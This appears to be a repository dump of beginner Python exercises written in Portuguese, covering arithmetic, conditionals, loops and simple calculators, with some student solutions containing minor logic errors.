"is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1261, "license_type": "no_license", "max_line_length": 319, "num_lines": 35, "path": "/Ex 030.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que faça 5 perguntas para uma pessoa sobre um crime. As perguntas são:\n\"Telefonou para a vítima?\"\n\"Esteve no local do crime?\"\n\"Mora perto da vítima?\"\n\"Devia para a vítima?\"\n\"Já trabalhou com a vítima?\" O programa deve no final emitir uma classificação sobre a participação da pessoa no crime. Se a pessoa responder positivamente a 2 questões ela deve ser classificada como \"Suspeita\", entre 3 e 4 como \"Cúmplice\" e 5 como \"Assassino\". Caso contrário, ele será classificado como \"Inocente\".\"\"\"\n\nprint('Programa classificação criminal')\np1 = input('Telefonou para a vítima? (s/n): ')\np2 = input('Esteve no local do crime? (s/n): ')\np3 = input('Mora perto da vítima? (s/n): ')\np4 = input('Devia para a vitima? (s/n): ')\np5 = input('Já trabalhou com a vítima? 
(s/n): ')\nlista = []\nlista.append(p1)\nlista.append(p2)\nlista.append(p3)\nlista.append(p4)\nlista.append(p5)\ncount_s = 0\ncount_n = 0\nfor i in lista:\n if i == 's':\n count_s = count_s + 1\n else:\n count_n = count_n + 1\n\nif count_s == 2:\n print('classificação = \"suspeita\"')\nelif count_s == 3 or count_s == 4:\n print('classificação = \"Cúmlice\"')\nelif count_s == 5:\n print('classificação = \"Assassino\"')\nelse:\n print('Inocente...')\n" }, { "alpha_fraction": 0.6360656023025513, "alphanum_fraction": 0.66557377576828, "avg_line_length": 49.83333206176758, "blob_id": "c7b41fd59d15cc32d0660e45490ed3b6ebbbd224", "content_id": "845ad445c0d5b3ad4714f09e0bd84e3190f24409", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 311, "license_type": "no_license", "max_line_length": 168, "num_lines": 6, "path": "/Ex 034.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que peça uma nota, entre zero e dez. Mostre uma mensagem caso o valor seja inválido e continue pedindo até que o usuário informe um valor válido.\"\"\"\n\nnt = int(input('Entre com uma nota (0 a 10): '))\n\nwhile (nt > 0) and (nt < 10):\n nt = int(input('Entre com uma nota (0 a 10): '))\n" }, { "alpha_fraction": 0.5562770366668701, "alphanum_fraction": 0.6028138399124146, "avg_line_length": 33.25925827026367, "blob_id": "0aed359f5094058dae6b60156c0a0a3a43e06f93", "content_id": "82bf0bd7a66401615746ec74b90525c3eae81d03", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 932, "license_type": "no_license", "max_line_length": 296, "num_lines": 27, "path": "/Ex 032.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Uma fruteira está vendendo frutas com a seguinte tabela de preços:\n Até 5 Kg Acima de 5 Kg\nMorango R$ 2,50 por Kg R$ 2,20 por Kg\nMaçã R$ 1,80 por Kg R$ 1,50 por Kg\nSe o cliente comprar mais de 8 Kg em frutas ou o valor total da compra ultrapassar R$ 25,00, receberá ainda um desconto de 10% sobre este total. Escreva um algoritmo para ler a quantidade (em Kg) de morangos e a quantidade (em Kg) de maças adquiridas e escreva o valor a ser pago pelo cliente.\"\"\"\n\n\nqt_mo = float(input('Quantos kgs de morango? '))\nqt_ma = float(input('Quantos kgs de maça? '))\np_mo = 0\np_ma = 0\nif qt_mo < 5:\n p_mo = qt_mo * 2.50\nelse:\n p_mo = qt_mo * 2.20\n\nif qt_ma < 5:\n p_ma = qt_ma * 1.80\nelse:\n p_ma = qt_ma * 1.50\np_geral = p_mo + p_ma\n\n\nif qt_mo + qt_ma >= 8 or p_geral > 25:\n p_geral = p_geral - (p_geral*0.10)\n\nprint('Valor a ser pago: ', p_geral)" }, { "alpha_fraction": 0.5745097994804382, "alphanum_fraction": 0.6235294342041016, "avg_line_length": 24.947368621826172, "blob_id": "dc4938e35b61e34a0fb303cd588a3b8b910cf7da", "content_id": "015aba6b3b14acf2e8b5df8f38aa967e80fc26f4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 514, "license_type": "no_license", "max_line_length": 154, "num_lines": 19, "path": "/Ex 062.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que calcule o fatorial de um número inteiro fornecido pelo usuário. Ex.: 5!=5.4.3.2.1=120. A saída deve ser conforme o exemplo abaixo:\r\nFatorial de: 5\r\n5! = 5 . 4 . 3 . 2 . 
1 = 120\"\"\"\r\n\r\nn = int(input('Entre com um numero para ser fatorado: '))\r\n\r\nresultado = 1\r\ncount = 1\r\n\r\nwhile count <= n:\r\n resultado *= count\r\n count += 1\r\nprint(resultado)\r\n\"\"\"\r\nnumero = int(input('Entre com o numero: '))\r\nresultado = 1\r\nfor n in range (1, numero + 1):\r\n resultado *= \r\nprint(resultado)\"\"\"" }, { "alpha_fraction": 0.6276150345802307, "alphanum_fraction": 0.6527196764945984, "avg_line_length": 22.799999237060547, "blob_id": "10ca49507e429bf6330adcb63e90d40a85638a99", "content_id": "df5ad5ee30818ac9f235aabc9b610133e8798c74", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 242, "license_type": "no_license", "max_line_length": 66, "num_lines": 10, "path": "/Ex 006.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um Programa que peça dois números e imprima o maior deles.\n\"\"\"\n\nnum_1 = float(input('Entre com o primeiro numero: '))\nnum_2 = float(input('Entre com o segundo numero: '))\n\nif num_1 > num_2:\n print(num_1)\nelse:\n print(num_2)\n\n" }, { "alpha_fraction": 0.607594907283783, "alphanum_fraction": 0.6126582026481628, "avg_line_length": 22.294116973876953, "blob_id": "ce5c902505fbdefeb74624aad2804d8c68376f54", "content_id": "85df86d7cd11762366ac89410097d2fdb9943f55", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 397, "license_type": "no_license", "max_line_length": 119, "num_lines": 17, "path": "/Ex 049.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que, dado um conjunto de N números, determine o menor valor, o maior valor e a soma dos valores.\"\"\"\n\nsoma = 0\ncondition = True\nnumero = []\n\nwhile condition:\n n = int(input('Informe um numero: '))\n if n != 0:\n soma += n\n numero.append(n)\n else:\n break\n\nprint('Soma: ', soma)\nprint('Menor valor: ', min(numero))\nprint('Mairo valor: ', max(numero))" }, { "alpha_fraction": 0.6521739363670349, "alphanum_fraction": 0.6608695387840271, "avg_line_length": 27.875, "blob_id": "c8670e0bf98f7db5cdac7f7a8172b4df24f3ae0e", "content_id": "8ae773bbd79ef580a6ee4767d1363cf329012736", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 235, "license_type": "no_license", "max_line_length": 111, "num_lines": 8, "path": "/Ex 028.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que peça um numero inteiro e determine se ele é par ou impar. Utilize operador de modulo\"\"\"\n\nnum = int(input('Entre com o numero: '))\n\nif num % 2 == 0:\n print('Numero par')\nelse:\n print('Número ímpar...')" }, { "alpha_fraction": 0.7131258249282837, "alphanum_fraction": 0.7307171821594238, "avg_line_length": 45.25, "blob_id": "6bee0f8b6331a842fc49b92c8cc3b39eaf684e6b", "content_id": "9b42fb78dcf148ed8c256f69c1c709a687e4e2f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 755, "license_type": "no_license", "max_line_length": 283, "num_lines": 16, "path": "/Ex 002.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um Programa que pergunte quanto você ganha por hora e o número de horas trabalhadas no mês. 
Calcule e mostre o total do seu salário no referido mês, sabendo-se que são descontados 11% para o Imposto de Renda, 8% para o INSS e 5% para o sindicato, faça um programa que nos dê:\nsalário bruto.\nquanto pagou ao INSS.\nquanto pagou ao sindicato.\no salário líquido.\"\"\"\n\nganho_hr = float(input('Quanto se ganha por hora? '))\nqt_hrs = float(input('Quantas horas sao trabalhadas por mẽs? '))\n\nbruto = ganho_hr*qt_hrs\nprint(bruto)\nir = (bruto*0.11)\ninss = (bruto*0.08)\nsindicato = (bruto*0.05)\nliquido = bruto-ir-inss-sindicato\nprint('Seu sal bruto é: ', bruto, 'Descontos: IR-INSS-sindicato:', ir,inss,sindicato, 'Sal liquido é: ', liquido )" }, { "alpha_fraction": 0.5182679295539856, "alphanum_fraction": 0.5683355927467346, "avg_line_length": 26.407407760620117, "blob_id": "74ab93afa8fe5cb449179f5fffec5f417ea72b24", "content_id": "ef08f7a16447aae24c75519a1141e163c80900c9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 745, "license_type": "no_license", "max_line_length": 104, "num_lines": 27, "path": "/Ex 023.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um Programa que peça uma data no formato dd/mm/aaaa e determine se a mesma é uma data válida.\"\"\"\n\nvalida = False\n\ndia = int(input('Entre com uma dia: '))\nmes = int(input('Entre com uma mes: '))\nano = int(input('Entre com uma dia: '))\n\n#mes com 31 dias\nif ( mes == 1 or mes == 3 or mes ==5 or mes == 7 or mes == 8 or mes == 10 or mes ==12):\n if(dia<=31):\n valida = True\n#meses com 30 dias\nelif ( mes==4 or mes==6 or mes==9 or mes==11):\n if(dia<=30):\n valida = True\nelif mes==2:\n #testa se e bissexto\n if (ano%4==0 and ano%100!=0) or (ano%400==0):\n if(dia<=29):\n valida = True\n elif(dia<=28):\n valida = True\nif (valida):\n print('Data válida...')\nelse:\n print('Inválida...')" }, { "alpha_fraction": 0.5563725233078003, "alphanum_fraction": 0.5686274766921997, "avg_line_length": 20.526315689086914, "blob_id": "6734d25a36b656fea9923b2f73deb3348ee77a1d", "content_id": "6221f7c7cee16134dab59beeca6eccca2470a778", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 412, "license_type": "no_license", "max_line_length": 78, "num_lines": 19, "path": "/Ex 041.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que leia 5 números e informe a soma e a média dos números.\n\"\"\"\nlista = []\ni = 1\nwhile i <= 5:\n a = int(input('Informe os numeros: '))\n lista.append(a)\n media = sum(lista)/len(lista)\n soma = sum(lista)\n i += 1\nprint(lista, soma, media)\n\nl = []\nfor i in range (5):\n a = int(input('Informe os valores: '))\n l.append(a)\n m = sum(l)/len(l)\n s = sum(l)\nprint(l, s, m)" }, { "alpha_fraction": 0.6204819083213806, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 30.1875, "blob_id": "a866d8030c5b99f2a2799a35fec44dbd3b26c685", "content_id": "9ca5aefe16041b49bcc26798d7f69c3fd7900bfc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 509, "license_type": "no_license", "max_line_length": 151, "num_lines": 16, "path": "/Ex 013.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que pergunte o preço de três produtos e informe qual produto você deve comprar, sabendo que a decisão é sempre pelo mais barato.\"\"\"\n\nprint('Entre com o preço dos 3 produtos que deseja comprar')\n\np1= float(input('Preço 1: 
'))\np2 = float(input('Preço 2: '))\np3 = float(input('Preço 3: '))\n\nmais_barato = 0\nif p1 < p2 and p1 < p3:\n mais_barato = p1\nif p2 < p1 and p2 < p3:\n mais_barato = p2\nif p3 < p1 and p3 < p2:\n mais_barato = p3\nprint('O mais barato é: ', mais_barato)" }, { "alpha_fraction": 0.7274881601333618, "alphanum_fraction": 0.7322275042533875, "avg_line_length": 59.28571319580078, "blob_id": "1869a27380957f34bb50aa3e7ead652d2c5c29af", "content_id": "4fa307ef7179878b878c9e3ace6bc260ab974b85", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 424, "license_type": "no_license", "max_line_length": 214, "num_lines": 7, "path": "/Ex 005.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que peça o tamanho de um arquivo para download (em MB) e a velocidade de um link de Internet (em Mbps), calcule e informe o tempo aproximado de download do arquivo usando este link (em minutos).\n\"\"\"\n\narquivo = float(input('Qual o tamanho do arquivo para dowload(mb): '))\ninternet = float(input('Qual a velocidade da internet? '))\n\nprint('Tempo aproximado de donwload(min): ', ((arquivo/internet)*60 ))\n" }, { "alpha_fraction": 0.6125116944313049, "alphanum_fraction": 0.6255835890769958, "avg_line_length": 28.657142639160156, "blob_id": "94c0edc992bb22f2dd612d695fd706d91cb145ad", "content_id": "b289b4b9d013d1206273f37ed316c996728cf895", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1078, "license_type": "no_license", "max_line_length": 194, "num_lines": 35, "path": "/Ex 058.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que calcule o número médio de alunos por turma. Para isto, peça a quantidade de turmas e a quantidade de alunos para cada turma. As turmas não podem ter mais de 40 alunos.\"\"\"\r\n\r\nturmas = int(input('Entre com a quantidade de turmas: '))\r\nlista = []\r\ncount = 0\r\n\r\nwhile count < turmas:\r\n alunos = int(input('Quantidade de alunos: '))\r\n count += 1\r\n if alunos < 40:\r\n lista.append(alunos)\r\n else:\r\n print('A quantidade de alunos por turma deve ser menor que 40...')\r\n\r\nmedia = sum(lista)/len(lista)\r\nprint(f\"A media dos alunos é de: {media}\")\r\n\r\n\r\n\r\n\r\n\"\"\"\r\nturmas = int(input('Digite a quantidade de turmas: '))\r\nalunos_turmas = []\r\nturma = 1\r\n\r\nfor i in range(turmas):\r\n print(f\"turma, {turma}\")\r\n alunos = int(input('Alunos da turma: '))\r\n while alunos > 40:\r\n print('turma ', turma, \" [ uma turma so pode ter 40 alunos ]\")\r\n alunos = int(input('Alunos da turma: '))\r\n turma += 1\r\n alunos_turmas.append(alunos)\r\nmedia = sum(alunos_turmas)/len(alunos_turmas)\r\nprint('A media é igual a: ', media)\"\"\"" }, { "alpha_fraction": 0.6373626589775085, "alphanum_fraction": 0.6556776762008667, "avg_line_length": 44.33333206176758, "blob_id": "0433d57e78751a819bb1317b4c4b4a6f144c9055", "content_id": "bde82b0680f2f2c545666a0182fc94b5c275b520", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 275, "license_type": "no_license", "max_line_length": 169, "num_lines": 6, "path": "/Ex 044.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Desenvolva um gerador de tabuada, capaz de gerar a tabuada de qualquer número inteiro entre 1 a 10. 
O usuário deve informar de qual numero ele deseja ver a tabuada\"\"\"\n\ntb = int(input('Tabuada de: '))\nfor n in range (11):\n a = f\"{tb} x {n} = {(n * tb)}\"\n print(a)\n\n" }, { "alpha_fraction": 0.6896551847457886, "alphanum_fraction": 0.6896551847457886, "avg_line_length": 49.77777862548828, "blob_id": "b9e5ec2aa351ca9f2fbdb299f5fd94615dc6e247", "content_id": "a51c3478f5d2085d3503e5390c5212fa6ac3a118", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 475, "license_type": "no_license", "max_line_length": 213, "num_lines": 9, "path": "/Ex 059.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que calcule o valor total investido por um colecionador em sua coleção de CDs e o valor médio gasto em cada um deles. O usuário deverá informar a quantidade de CDs e o valor para em cada um.\"\"\"\r\n\r\ncds = int(input('Qual a quantidade de cds da coleção? '))\r\nlist = []\r\n\r\nfor i in range(cds):\r\n vlr = int(input('Qual o valor de cada cd? '))\r\n list.append(vlr)\r\nprint(f\"A media do valor gasto por cd na coleção é de: {(sum(list)/len(list))}\")" }, { "alpha_fraction": 0.6606523394584656, "alphanum_fraction": 0.7078417539596558, "avg_line_length": 36.94736862182617, "blob_id": "1ccc55f6ccb8ee55b6f25d7a93f85adc24694f6a", "content_id": "5ddaacd84c545559aa2de4cf4c51383e72b421e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1466, "license_type": "no_license", "max_line_length": 451, "num_lines": 38, "path": "/Ex 017.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa para o cálculo de uma folha de pagamento, sabendo que os descontos são do Imposto de Renda, que depende do salário bruto (conforme tabela abaixo) e 3% para o Sindicato e que o FGTS corresponde a 11% do Salário Bruto, mas não é descontado (é a empresa que deposita). O Salário Líquido corresponde ao Salário Bruto menos os descontos. O programa deverá pedir ao usuário o valor da sua hora e a quantidade de horas trabalhadas no mês.\nDesconto do IR:\nSalário Bruto até 900 (inclusive) - isento\nSalário Bruto até 1500 (inclusive) - desconto de 5%\nSalário Bruto até 2500 (inclusive) - desconto de 10%\nSalário Bruto acima de 2500 - desconto de 20% Imprima na tela as informações, dispostas conforme o exemplo abaixo. No exemplo o valor da hora é 5 e a quantidade de hora é 220.\"\"\"\n\n\nhr = float(input('Qual o valor das horas trabalhadas? '))\nqtn = float(input('Qual a quantidade de horas trabalhadas? 
'))\n\nbruto = hr * qtn\nprint('Bruto: ', bruto)\n\nfgts = (bruto*11)/100\nprint('FGTS: ', fgts)\n\ninss = (bruto*10)/100\nprint('INSS: ', inss)\n\nsindicato = (bruto*3)/100\nprint('Sindicato: ', sindicato)\n\nir = 0\nif bruto <= 900:\n ir = 0\nelif bruto <= 1500:\n ir = (5*bruto)/100\nelif bruto <= 2500:\n ir = (10*bruto)/100\nelse:\n ir = (20*bruto)/100\n\n\ndescontos = ir + inss\nliquido = bruto - descontos\n\nprint('Salario bruto: ', bruto,'IR: ', ir, 'INSS: ', inss,'FGTS: ', fgts,'Descontos: ', descontos,'Total liquido: ', liquido)" }, { "alpha_fraction": 0.6706587076187134, "alphanum_fraction": 0.6898203492164612, "avg_line_length": 36.90909194946289, "blob_id": "313a02efa741682300ad064ba4f16072dfeb4b10", "content_id": "7f3a2329c15e50aec2fc7f34383049902ae78aa3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 858, "license_type": "no_license", "max_line_length": 214, "num_lines": 22, "path": "/Ex 020.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um Programa que peça os 3 lados de um triângulo. O programa deverá informar se os valores podem ser um triângulo. Indique, caso os lados formem um triângulo, se o mesmo é: equilátero, isósceles ou escaleno.\nDicas:\nTrês lados formam um triângulo quando a soma de quaisquer dois lados for maior que o terceiro;\nTriângulo Equilátero: três lados iguais;\nTriângulo Isósceles: quaisquer dois lados iguais;\nTriângulo Escaleno: três lados diferentes;\"\"\"\n\nl1 = float(input('Lado um do triangulo: '))\nl2 = float(input('Lado dois do triangulo: '))\nl3 = float(input('Lado tres do triangulo: '))\n\nif l1 + l2 >= l3:\n print('É um triangulo')\n if l1 == l2 == l3:\n print('Equilátero')\n elif l1 == l2 or l2 == l3 or l1 == l3:\n print('Isósceles')\n else:\n print('Escaleno')\n\nelse:\n print('Não é um triangulo')\n\n" }, { "alpha_fraction": 0.7079566121101379, "alphanum_fraction": 0.7305606007575989, "avg_line_length": 56.31578826904297, "blob_id": "931790f8eb4d21290c990e84f00d8e51fe172d7c", "content_id": "c0572e2cb4b66ab5d6f4e3616152186fe5b838e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1124, "license_type": "no_license", "max_line_length": 648, "num_lines": 19, "path": "/Ex 061.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"O Sr. Manoel Joaquim expandiu seus negócios para além dos negócios de 1,99 e agora possui uma loja de conveniências. Faça um programa que implemente uma caixa registradora rudimentar. O programa deverá receber um número desconhecido de valores referentes aos preços das mercadorias. Um valor zero deve ser informado pelo operador para indicar o final da compra. O programa deve então mostrar o total da compra e perguntar o valor em dinheiro que o cliente forneceu, para então calcular e mostrar o valor do troco. Após esta operação, o programa deverá voltar ao ponto inicial, para registrar a próxima compra. A saída deve ser conforme o exemplo abaixo:\r\nLojas Tabajara\r\nProduto 1: R$ 2.20\r\nProduto 2: R$ 5.80\r\nProduto 3: R$ 0\r\nTotal: R$ 9.00\r\nDinheiro: R$ 20.00\r\nTroco: R$ 11.00\r\n...\"\"\"\r\n\r\nproduto = float(input('Entre com o preço: '))\r\nlista = []\r\nwhile produto !=0 :\r\n produto = float(input('Entre com o preço: '))\r\n lista.append(produto)\r\nsoma = sum(lista)\r\ndinheiro = float(input('Qual o valor do pagamento? 
'))\r\n\r\nprint(f\"LOJAS TABAJARA \\n Total: {soma} \\n Dinheiro: {dinheiro} \\n Troco: {(dinheiro-soma)}\")" }, { "alpha_fraction": 0.7145708799362183, "alphanum_fraction": 0.7145708799362183, "avg_line_length": 48.29999923706055, "blob_id": "f8d9b5695763e561bf87c0908a742e99869a0563", "content_id": "bf25a00068eaddbf4aacb898d3b0e36c86f4591a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 502, "license_type": "no_license", "max_line_length": 240, "num_lines": 10, "path": "/Ex 063.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"O Departamento Estadual de Meteorologia lhe contratou para desenvolver um programa que leia as um conjunto indeterminado de temperaturas, e informe ao final a menor e a maior temperaturas informadas, bem como a média das temperaturas.\"\"\"\r\n\r\n\r\nn_temp = int(input('Qual a quantidade de temperaturas? '))\r\ntemp = []\r\n\r\nfor i in range (n_temp):\r\n temperatura = temp.append(float(input('Entre com a temperatura: ')))\r\n \r\nprint(f\"Maior: {max(temp)} Menor: {min(temp)} Media: {sum(temp)/len(temp)}\")" }, { "alpha_fraction": 0.6029962301254272, "alphanum_fraction": 0.6254681944847107, "avg_line_length": 32.3125, "blob_id": "b1b82fc5997a4c863cd0de185d1eca55458d91bb", "content_id": "3839ff245f1d3fb89c2b85aa8f7e5fa6d649d939", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 539, "license_type": "no_license", "max_line_length": 131, "num_lines": 16, "path": "/Ex 046.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que peça 10 números inteiros, calcule e mostre a quantidade de números pares e a quantidade de números impares.\n\"\"\"\n\nlista_par = []\nlista_impar = []\ncount_par = 0\ncount_impar = 0\nfor i in range (10):\n n = int(input('Entre com os numeros: '))\n if n % 2 == 0:\n count_par += 1\n lista_par.append(n)\n elif n % 2 != 0:\n count_impar += 1\n lista_impar.append(n)\nprint(f\"Lista impar: {lista_impar} quantidade impar: {count_impar}, lista par: {lista_par}, quantidade par: {count_par}\")\n\n" }, { "alpha_fraction": 0.6697965860366821, "alphanum_fraction": 0.693270742893219, "avg_line_length": 39, "blob_id": "d3379c4e3a7e371830181a9c671d33b77048399e", "content_id": "0b6863d04e035bba4c80312897967cea7367ba8c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 652, "license_type": "no_license", "max_line_length": 134, "num_lines": 16, "path": "/Ex 025.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um Programa para leitura de três notas parciais de um aluno. 
O programa deve calcular a média alcançada por aluno e presentar:\nA mensagem \"Aprovado\", se a média for maior ou igual a 7, com a respectiva média alcançada;\nA mensagem \"Reprovado\", se a média for menor do que 7, com a respectiva média alcançada;\nA mensagem \"Aprovado com Distinção\", se a média for igual a 10.\"\"\"\n\nnt_1 = int(input('Entre com valor trimestre 1: '))\nnt_2 = int(input('Entre com o valor trimesre 2: '))\nnt_3 = int(input('Entre om o valor trimestre 3: '))\n\ntt = nt_1 + nt_2 + nt_3\nmm = tt / 3\nprint(mm)\nif mm >= 7:\n print('Apr.')\nelse:\n print('Rep.')" }, { "alpha_fraction": 0.6169666051864624, "alphanum_fraction": 0.6272493600845337, "avg_line_length": 30.25, "blob_id": "7c1038a8db99d96fbb4a35323a8f5a2e27d4c8d4", "content_id": "11a3968667f8ae15529a45252b21f8ced609e7fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 793, "license_type": "no_license", "max_line_length": 183, "num_lines": 24, "path": "/Ex 057.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Numa eleição existem três candidatos. Faça um programa que peça o número total de eleitores. Peça para cada eleitor votar e ao final mostrar o número de votos de cada candidato.\"\"\"\r\n\r\nn_eleitores = int(input('Qual o numero total de eleitores? '))\r\nl_candidatos = []\r\n\r\ncount_A = 0\r\ncount_B = 0\r\ncount_C = 0\r\nn_repetições = 0\r\nwhile n_repetições < n_eleitores:\r\n voto = (input('Qual candidato deseja votar? A,B,C: ')).upper()\r\n l_candidatos.append(voto)\r\n n_repetições += 1\r\nprint(l_candidatos)\r\n\r\nfor i in l_candidatos:\r\n if i == 'A':\r\n count_A += 1\r\n elif i == 'B':\r\n count_B += 1\r\n else:\r\n count_C += 1\r\n\r\nprint(f\"A quantidade de pessoas que votou no candidato A é de: {count_A}. Candidato B: {count_B}. Candidato C: {count_C}\")\r\n\r\n\r\n" }, { "alpha_fraction": 0.6590105891227722, "alphanum_fraction": 0.6696113348007202, "avg_line_length": 33.375, "blob_id": "03d270ce9e971e518c0124263254f2b3b176b005", "content_id": "9a17b23c61c6a6b7cb3a9a482558d76c8445a0ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 585, "license_type": "no_license", "max_line_length": 260, "num_lines": 16, "path": "/Ex 064.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Os números primos possuem várias aplicações dentro da Computação, por exemplo na Criptografia. Um número primo é aquele que é divisível apenas por um e por ele mesmo. 
Faça um programa que peça um número inteiro e determine se ele é ou não um número primo\"\"\"\r\n\r\nn = int(input(\"Verificar numeros primos ate: \"))\r\nmult=0\r\n\r\nfor count in range(2,n):\r\n    if (n % count == 0):\r\n        print(\"Múltiplo de\",count)\r\n        mult += 1\r\n\r\nif(mult==0):\r\n    print(\"É primo\")\r\nelse:\r\n    print(\"Tem\",mult,\" múltiplos acima de 2 e abaixo de\",n)\r\n\r\n#Exercicios wikipython br\r\n" }, { "alpha_fraction": 0.6286764740943909, "alphanum_fraction": 0.6654411554336548, "avg_line_length": 29.11111068725586, "blob_id": "b77b2a7f4714c26801f42ca6ec9835d283cbc2f3", "content_id": "bff4c4de0bf0f61f5da62f028bb538e937df6b93", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 277, "license_type": "no_license", "max_line_length": 126, "num_lines": 9, "path": "/Ex 022.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um Programa que peça um número correspondente a um determinado ano e em seguida informe se este ano é ou não bissexto.\n\"\"\"\n\nano = int(input('Entre com o ano: '))\n\nif (ano%4==0 and ano%100!=0) or (ano%400==0):\n    print('Bissexto')\nelse:\n    print('Não é bissexto')\n\n" }, { "alpha_fraction": 0.6691480278968811, "alphanum_fraction": 0.6823821067810059, "avg_line_length": 42.21428680419922, "blob_id": "7626ba157020a6e67630d783a958221ad18ace0d", "content_id": "e367b5ed22a17dd93008cb20364fca67a3782b40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1241, "license_type": "no_license", "max_line_length": 216, "num_lines": 28, "path": "/Ex 021.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que calcule as raízes de uma equação do segundo grau, na forma ax2 + bx + c. O programa deverá pedir os valores de a, b e c e fazer as consistências, informando ao usuário nas seguintes situações:\nSe o usuário informar o valor de A igual a zero, a equação não é do segundo grau e o programa não deve pedir os demais valores, sendo encerrado;\nSe o delta calculado for negativo, a equação não possui raizes reais. Informe ao usuário e encerre o programa;\nSe o delta calculado for igual a zero a equação possui apenas uma raiz real; informe-a ao usuário;\nSe o delta for positivo, a equação possui duas raiz reais; informe-as ao usuário;\"\"\"\n\nimport math\n\nprint('Programa que acha as raizes de ax2 + bx + c = 0')\n\na = int(input('Coeficiente a: '))\n\nif (a==0):\n    print('A == 0. A equação não é do segundo grau')\nelse:\n    b = int(input('Coeficiente b: '))\n    c = int(input('Coeficiente c: '))\n    delta = b*b - 4*a*c\n\n    # O teste de delta agora fica dentro do else: antes ele rodava mesmo com a == 0 (delta indefinido -> NameError)\n    if delta < 0:\n        print('Delta menor que zero, raízes imaginárias.')\n    elif delta == 0:\n        raiz = -b/(2*a)\n        print('Delta=0 , raiz = ', raiz)\n    else:\n        raiz1 = (-b + math.sqrt(delta)) / (2*a)  # era / 2*a, que por precedência multiplica por a\n        raiz2 = (-b - math.sqrt(delta)) / (2*a)\n        print('Raízes: ', raiz1, raiz2)" }, { "alpha_fraction": 0.582172691822052, "alphanum_fraction": 0.6350975036621094, "avg_line_length": 21.5, "blob_id": "ee76576f9c3a76d30de19f309945ab78f5c58ecb", "content_id": "d354570f387ca4780c337c55e53e078f70c4cc6d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 363, "license_type": "no_license", "max_line_length": 109, "num_lines": 16, "path": "/Ex 050.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que calcule o 